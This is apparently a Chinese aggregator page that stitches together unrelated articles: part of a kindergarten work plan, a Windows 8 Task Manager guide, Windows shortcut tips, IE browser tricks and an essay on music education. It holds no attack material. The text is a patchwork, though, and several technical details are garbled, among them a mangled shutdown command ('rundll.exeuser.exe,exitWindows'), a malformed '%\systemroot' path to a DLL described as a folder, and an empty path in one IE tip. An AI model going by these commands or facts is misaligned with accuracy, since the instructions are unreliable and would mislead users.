以办人民满意的幼儿园为出发点和归宿,全面落实科学发展观,以管理求质量,以改进求发展,以争先创优的工作态度,努力提高保教质量。加强教师素质建设,努力打造一支有活力、有进取心、积极上进的教师队伍。
二、工作目标
1、加强管理,严格执行岗位工作细则,建立规范、科学、有序的工作秩序。
2、抓好《幼儿园教育纲要》的学习与贯彻落实,更新教师教育观念,鼓励教师不断创新,促进课程改革的深入。加强教师培训,提高教师业务、文化水平,促进每个教师的`自我发展,为我园的可持续发展打好基础。
3、以《幼儿园教育指导纲要》为依据,优化幼儿一日活动的组织,加强安全工作、德育工作,家园结合,加强幼儿文明习惯及各项技能的培养,促进幼儿健康、和谐发展。
4、抓好特色教育,开展特色活动,不断提高办园质量。
5、建立长效机制,做好安全、卫生保健工作,促进保教结合,切实保证师生健康。
7、根据实际条件,美化、优化校园环境,添置教玩具,配备教学仪器,不断优化办园条件。
三、具体工作及措施:
(一)加强政治、业务学习,加强教师培训。
1、定期召开教师例会,组织教师学习时事政治,各项教育方针、政策,学习“三个代表”、“八荣八耻”精神,要求全体教职工在工作中树立奉献精神、艰苦奋斗精神,创优质服务。
2、严格管理,调整、完善各项工作制度。
3、深入学习《纲要》精神,进一步更新教育理念。鼓励、支持教职工参加高一层学历教育及各种继续教育,提高教职工学历层次;组织教职工参加电脑及其他电化教学仪器的操作培训,提高老师电化教学水平。
4、加强自身业务学习,刻苦练习六项技能,组织教师外出参加各种培训,到中心园听课,努力提高教学水平。
5、组织教师开展技能竞赛,促进教师各项基本功、业务素质的提高。
(二)不断完善保育、教育工作
依据《纲要》基本要求,扎实抓好保教工作。
1、保育及卫生保健工作
(1)加强安全工作、保卫工作,落实安全工作制度,定期检查园内各类设施,安全工作责任到人,杜绝一切不安全因素;加强对幼儿、教师的自我保护教育、安全教育,确保幼儿、教师、园财产的安全。
(2)加强户外活动管理,针对本园户外活动场地、器械等情况调整幼儿户外活动方案并认真实施,保证幼儿户外活动时间、运动量达标。
(3)加强晨检力度,认真做好幼儿卫生保健工作、体检工作,并及时将幼儿情况向家长反馈;切实做好预防和控制传染病工作。
(4)培养幼儿良好学习习惯,如坐姿、书写姿势等;定期调换幼儿座位,保护幼儿视力;教育幼儿保护牙齿。
(5)加强幼儿良好行为习惯的培养,特别加强幼儿“文明礼貌”教育、卫生习惯教育。
2、教育工作
(1)继续深入开展主题教育。抓好幼儿一日常规教学,有计划、有准备、有组织、有总结、有反馈地开展各项教学工作。
(2)丰富幼儿生活,多样化地开展幼儿活动,如春、秋季趣味运动会、现场作画比赛、游园活动等,提高幼儿园社会声誉。
(3)根据《幼儿园教育指导纲要》,促进幼儿发展五大领域的和谐发展。
(4)从区域设置、玩具的投放、更新、区域规则的制定以及教师的区域指导等方面加强区域活动的开展,充分发挥区域活动的作用。
(5)通过现代化电教设备提高教育效果。
(6)根据幼儿实际,家园配合,生动、长期地开展幼儿思想品德教育,养成幼儿良好的文明习惯及社会公德。如:爱护公物、保护公共环境卫生教育等。
(7)不断更新、充实教研活动所需教玩具、图书、挂图、电教设备等资料,并加强材料管理,为教研活动的开展提供保证。
(8)组织教师撰写教研心得、教改论文,提高教师教研理论水平。
(三)行政后勤工作
1、加强管理力度,继续建立、完善各项规章制度并严格执行。
2、创导、营造一个自由安全的心理空间、快乐相融的人文集体,培育教师的团队协作精神,培养教师与人沟通合作能力,提高工作效率,共建愉快的工作氛围。
3、强化民主管理,切实实行园务公开。
4、确实加强安全教育,签订各部门安全工作责任书,把安全工作落到实处。
5、根据各园园舍实际进行环境改造,充分发挥每一处环境的教育作用,完善幼儿园各项设施设备。
(四)家长工作
1、不断加强家园联系工作,有计划地开展家园联系系列活动,丰富家长工作的内容和方式:发放家长问卷调查表,根据反馈情况调整改进工作促进家园共育。
2、邀请家长、社会各界人士参加幼儿园组织的大型活动。
四、每月常规工作安排:
1、政治业务学习。
2、教研会议
3、幼儿安全、卫生工作检查工作。
4、家园联系、家访工作。
五、各月工作安排:
九月份:
1、幼儿入园前的各项准备工作,如:环境卫生、环境布置等;
2、各园安全工作排查。
3、制定计划。
4、加强夏季消毒,防病工作,做好清洁、卫生工作;
5、开展教研活动;
6、准备教师节庆祝活动;
7、全镇幼儿教师六项技能培训
十月份
1、健全安全工作制度,各部门签定安全工作责任书。
2、幼儿园、各班针对实际情况制定工作计划。
3、开展教研活动。
4、对幼儿进行爱国主义教育、国防知识教育。
篇12:Windows 8任务管理器详解
作者:姜惠田
Windows系统任务管理器,大家应该都不陌生了,估计更多的朋友是当执行程序时遇到卡死而不得不通过 Ctrl+Alt+Delete 启动任务管理器去结束程序,另外就是通过任务管理器来查看当前系统的资源占用情况,比如CPU、内存等的资源占用。在Windows 8系统里,任务管理器也有了很大的变化,相比较Win7而言,更加人性化和智能,并且在界面操作和功能设置等方面,都有了非常大的改变。本文我们就来一窥Win8任务管理器的强大功能。
如何打开任务管理器?
自认是Windows高手的飘过哈:)。毕竟还有不少新手,尤其是刚体验Windows 8系统的新手,估计还有很多操作找不着北的呢。
1、也是正常操作途径:在桌面任务栏上,鼠标右键点击,选择“任务管理器”;
2、快捷键:Ctrl+Alt+Delete ,按下这组快捷键,还包括锁定、切换用户和注销等,当然也包括任务管理器;
3、快捷键:Ctrl+Shift+Esc ,可直接启动任务管理器;
4、运行:Win+R打开运行框,输入taskmgr 后确定;
5、在超级按钮的搜索里,输入中文“任务管理器”或者程序名“taskmgr”调出任务管理器;
6、快捷键:Win + X 弹出的菜单里选择任务管理器。
与Windows 7系统任务管理器对比
Window 7系统任务管理器(点击查看大图) 相比此前的Windows 98 、Windows XP,到Win7系统时,任务管理器的选项参数已经很多,除了基本的进程,还可以查看所有进程,以及加入了资源监视器等。但这些信息,不是一般小白用户能够看得懂的。使用最多的也不过是结束任务,但也仅限于能够识别的,比如是中文名称的,或者QQ这样的容易识别的。在进程里,那么多的英文名称和服务进程混杂在一起,想要知道每一个进程的属性还是不太容易,
但好在Win7的任务管理器也算非常智能和强大了,并且对资源的监视等,也都非常直观。
Windows 8任务管理器界面
Windows 8任务管理器-简略信息界面 Windows 8任务管理器-详细信息 上图中我们看到Win8系统的资源管理器非常简洁,并且被分为分为“简略信息”和“详细信息”两个界面,就外观而言似乎也美观了不少。在精简版任务管理器里,没有繁杂的功能标签,只有当前正在运行的程序,通过鼠标右键能够操作结束任务、打开文件位置和联机搜索等一些基本功能。但对于大多数用户来说,如果遇到程序卡死、系统不响应,在简化版里就已经能够实现任务的结束。接下来,我们主要说说Win8任务管理器的详细信息面板。
在任务管理器简化版的左下方我们展开“详细信息”切换到功能更强的完全版。在这里将会有更为强大的任务管理器:进程、性能、用户、服务,以及一些新增加的功能面板。
Windows 8任务管理器的功能介绍
进程:程序分组与新的命名方式
Win8任务管理器对正在运行的程序进行了分组,比如应用、后台进程、Windows进程,那么我们就比较容易快速判断该程序的属性。
Windows 8任务管理器对程序进行了分组 此外就是我们在这个任务管理器里,几乎所有运行的程序名称都很容易识别,不再像以前一大堆的英文基本看不懂,也就无法立即判断是否可以结束。而详细的服务进程,我们点击名称左侧的小三角展开,就可以查看当前全部进程了。当然,有些进程我们可能还是看不明白,并且不知道其含义。在想要了解的进程名称上,鼠标右键弹出的菜单里,点击“联机搜索”,就会自动打开默认浏览器搜索当前名称,帮助你确定某个后台进程是否有用。
联机搜索-在名称上鼠标右键 人性化的资源占用热度示警界面在“进程”里,除了名称的变化,这里的CPU、内存、磁盘、网络几个标签下的内容,还被用色块进行了标识,这里的意思是通过颜色的深度直观体现资源占用比率,减少了数字堆叠的单调,看起来非常舒适和明了。
篇13:挖掘Windows系统快捷方式的秘密
快捷方式是Windows系统为方便用户而设计的一个快捷功能,有了它,我们就可以快速打开各种文件,其实,快捷方式除了它的本职之外,还有许多秘密。
1.改变快捷方式图标
每个软件建立快捷方式的时候都会指定自己的图标,如果你嫌它没个性,没关系,改了它。右击它并选择“属性”,在“快捷方式”选项卡中选择“更改图标”,在打开的“更改图标”对话框中选择自己喜欢的图标(如图1)。如果这里也无法满足你,你还可以使用自己制作的图标,通过“浏览”选择自己的图标,确定以后你的快捷方式是不是与众不同啊!
Cico提示:在%\systemroot\system32\shell32.dll文件夹中包含了许多漂亮图标。
2.一键启动程序
笔者做课件的时候,经常会同时用到各种软件,如果你不想动用鼠标,你就可以为它们分别设置快捷键。下面以设置Photoshop的快捷键为例:右击Photoshop的快捷方式,选择“属性”,在“快捷方式”选项卡中将光标定位到“快捷键”一栏中,按下“F12”键,以后只要按这个键就可以快速启动PhotoShop了(如图2),
还可以用这个方法制作一键关机的快捷方式:在桌面上新建一个快捷方式,使用“%\systemboot\rundll.exeuser.exe,exitWindows”命令,然后为它指定一个按键,比如“F10”。以后要关机,只要按F10就可以了。
3.程序运行自动最大化
上网的时候,如果打开的网页老是最小化或者很小,是不是会觉得很烦人。这时可以右击IE的快捷方式,选择“属性”,再单击“快捷方式”选项卡,在“运行方式”下拉框中选择“最大化”后确定即可。现在试一试,是否感觉好多了。当然,如果觉得每次启动都是最大化不好,你也可以用同样的方法设置成“最小化”或者“常规窗口”。
4.快速查找程序安装文件夹
有时候我们想知道程序安装在什么位置,我们只要右击该程序的快捷方式图标,选择“属性”命令,然后再单击“查找目标”按钮,就可以打开安装程序的文件夹了。
5.去除快捷方式标志
快捷方式图标上的小箭头和“快捷方式”这几个字如果你看不顺眼,我们也可以把它去掉。打开注册表编辑器,找到“HKEY_CLASSES_ROOT\LNKFILE”项,在右侧窗体中删除名为“isshortcut”的字符串值,刷新一下桌面,是不是小箭头不见了?去除“快捷方式”这几个字的方法更简单,只要我们重命名该快捷方式即可。
图1“更改图标”对话框
图2“属性”对话框
篇14:挖掘IE浏览器的潜在功能
大家对IE浏览器一定再熟悉不过了,根据统计,目前使用IE浏览器的网民占了96%多,而使用其他浏览器的用户是很少的一部分了,但是仔细一想,尽管使用IE浏览器的人很多,但是也仅限于浏览网页,实际上这么“庞大”的一个软件(就安装文件就有70多兆),功能当然不只是浏览了。
Internet Explorer浏览器功能强大,当然并不是所有功能都有,因为使用windows操作系统的用户同样占着大部分,所以IE有些功能,操作系统都已经自带了,微软好像经常这么做,呵呵,所以IE浏览器的功能往往被遗忘掉,现在我整理了一些IE浏览器比较实用的功能,相信一定让你眼前一亮。
1、快速访问根目录
我们都已经比较习惯了打开资源管理器来打开文件,实际上在你使用IE浏览器时,如果需要打开文件,可以直接在浏览器中打开资源管理器,具体方法是:在浏览器操作界面的地址栏中我直接输入一个反斜杠字符(\),接着按一下回车键,就可以了访问根目录了。同理,如果想打开IE根目录下的文件夹只需要在“”后面直接跟文件夹名称就可以。
2、利用IE的邮件功能
IE浏览器可以直接利用集成在浏览器中的电子邮件软件来发送信件以及接受信件。一般来说,如果我们想在建立一个新邮件,都是打开Outlook Express,然后点“新建”邮件,实际上IE浏览器就可以直接撰写新邮件,你可以在IE浏览器的“工具”菜单中找到相关命令,虽然实际上是调用了IE默认的邮件编辑工具,但是这样还是方便不少。
3、改变临时文件夹存放位置
IE浏览器默认情况下会把临时文件存在系统盘如C盘中的临时文件夹中。那么,用户的C盘空间满了该怎么办呢?呵呵,其实没有什么好着急的,你可以把IE浏览器的临时文件夹设置在有富余空间的驱动器中,方法如下:首先把旧的文件夹复制到新的地方。打开Windows资源管理器窗口,接着再进入到C:\Windows子目录中,在资源管理器右边的窗口中找出“Temporary Internet Files”文件夹,把它复制到当前位置你指定的驱动器。
运行IE浏览器,打开其主操作界面,单击菜单栏中 “工具”里面的“Internet选项”命,程序会弹出一个选项对话框。在对话框中用鼠标单击“常规”标签。然后在Internet 临时文件设置栏下单击“设置”按钮,在打开的设置对话框中,再单击“移动文件夹”按钮。这样,程序会弹出一个“浏览文件夹”的对话框,在该对话框中单击D盘中的新文件夹,最后再单击一下“确定”按钮,然后依次关闭“设置”对话框和“Internet选项”对话框,重新打开计算机运行IE浏览器,这时用户就会发现自己所有的临时文件都被存储在了自己设置的新的驱动器中了。
4、在浏览器地址栏直接运行程序
当浏览器在打开的情况下,如果这时需要运行系统中的另外一个程序的话,不必在像原来那样,必须暂停浏览器的运行,打开另外一个窗口来启动程序。那怎么办呢?其实直接使用浏览器也能把需要的程序打开。具体操作步骤如下:
首先打开浏览器窗口,在地址栏中直接输入运行程序在硬盘中的绝对路径,例如我们在地址栏中输入“d:\winnt\Ptlic32.exe”,输入完毕后再单击一下回车键,接着浏览器就会在浏览窗口中自动打开指定程序的界面,
点击阅读更多学院相关文章>>
分享到 5、清除表单中的记录
IE浏览器有自动填写表单功能,可以把用户输入到网页中的表单信息存储起来。如果用户返回到自己曾经填写过的表单页面中,IE 5.5提示用户用自己最近一次输入的信息内容。这样一来,表单很快会变得十分拥挤,所以需要找个办法进行删除。
实际上利用浏览器自带的功能就可以轻易地清除所有表单中的记录信息。选择“工具”中的“Internet选项”,再选择“内容”标签,然后再单击“自动完成”按钮,将会弹出一个 “自动完成设置”对话框:
在对话框的“清除自动完成历史记录”设置栏中,单击“清除表单”按钮。如果用户想要删除口令记录信息,就可以直接单击“清除密码”按钮。最后在弹出的确认对话框中单击“确定”按钮就可以了。
6、使用浏览器来下载文件
怎么回事?浏览器还能进行FTP下载?是不是很新鲜,其实这是千真万确的事情。IE5浏览器新增加了FTP功能,你可以不再使用其它FTP工具从FTP服务器上下载文件,而直接从IE浏览器进行下载。具体操作方法是:
打开浏览器操作界面,在菜单栏中找到“工具”中的“Internet选项”命令,然后在弹出的选项对话框中选择“高级”标签,然后再从该标签下找到“浏览”设置区,并选择“使用基于web的FTP”复选项,最后再点击“确定”按钮,就可以使用浏览器中内置的FTP程序来下载文件了。
这样,当你在网上看到自己爱不释手的内容时,就不会因为手头边没有专门的下载工具而犯愁了。
7、用浏览器快速查看文件
如果在一个文件夹中有很多网页,你想一个一个浏览这的话,那就用鼠标双击第1个文件,Windows会自动打开一个浏览器窗口,显示出刚才被点击的文件。然后切换回资源管理器,双击第2个文件,又打开一个新的浏览器窗口,然后是第3个,第4个……这样反反复复打开关闭窗口,操作麻烦速度慢不说,而且打开窗口过多,最终会耗尽系统资源。那么如何才能在一个窗口中依次快速地显示这些文件?现在有一个解决办法,具体操作步骤如下:
在Windows桌面上打开资源管理器,在管理器中找到自己要查看的文件夹,使待查看的文件在文件列表中显示出来。双击第1个文件,就像上面所说,将打开一个缺省的浏览器窗口。适当调节浏览器窗口的大小和位置,使它不至于挡住资源管理器中的文件列表。然后用鼠标把第2个文件从文件列表中直接拖放到浏览器窗口,当松开鼠标按键时,被拖拽的文件就会立刻在浏览器窗口显示出来。一次拖放即显示一个文件,真可谓多快好省?br/>
上一页 1 2
点击阅读更多学院相关文章>>
分享到
篇15:努力挖掘音乐教育的多方面功能
??音乐是各种不同文化的符号性载体,记录和再现了人类文化和思想的发生、发展过程。在实施新课程中,要努力挖掘音乐教育(www.xfhttp.com-上网第一站xfhttp教育网)的多方面功能。
??首先,通过音乐与文化的连接,帮助学生了解不同地区文化背景,学会尊重多元文化。
在音乐教学中,可以让学生联系到参与社区、家乡的节目、庆典、联欢等活动,了解其中的民族民间音乐、歌舞、戏曲等文化,了解它们与其他地区或其他民族文化的异同。通过观看或聆听中外音乐作品,结合有关资料,让学生了解相关国家的地理、历史、风俗人情、社会风貌,增进对不同民族,不同风格音乐的了解与尊重。例如:在"过新年"的设计中,可在聆听和感受《小拜年》、《窗花舞》的基础上让学生说说自己知道的不同地区过年的情景,通过看录像、图片等,了解与中国年文化有关的年画、剪纸、春联及相关风俗。如《小拜年》则以湖南农村为例,感受那里庆丰年、闹秧歌的热烈气氛,然后再进行演唱湖南花鼓调《小拜年》,再通过师生共同讨论如何剪窗花、写春联、扭秧歌等,分组参与制作、绘画、创编歌词、学走秧歌步、学打秧歌鼓点等活动,让学生感受中国年文化的'情趣,同时了解中国年文化有关的习俗。
??其次,还可以通过音乐与科技手段的简单结合,让学生感受和了解常见科技产品中蕴涵的艺术要素,了解艺术想象和审美要求对科技发展的价值和促进作用,让学生对所学所知的科学内容进行艺术的创造与表现;探索现代科技手段对艺术形式和风格的影响;引导学生讨论古代和现代人有哪些艺术想象激发了科学探索。如人们对飞行的想象和需要促进了飞机的出现,对太空的想象促进了火箭和飞船的研制;音乐想象对服装设计、汽车造型、建筑造型、舞台设计等产生影响。例如:《音乐》教材第一册"静静的夜"单元中的《闪烁的小星》、《星光恰恰恰》的学习,引导学生感受和发现音乐中的"想象美",启发学生从新的角度关注音乐、关注科学,达到感性与理性的平衡,使身心得到健康和谐的发展,从而全方位地提高人们的精神素质,从根本上推进一个社会的内在品格。
【挖掘Windows 任务计划 功能】相关文章:
6.教学任务
7.认知的挖掘作文
10.任务分解范文
文档为doc格式
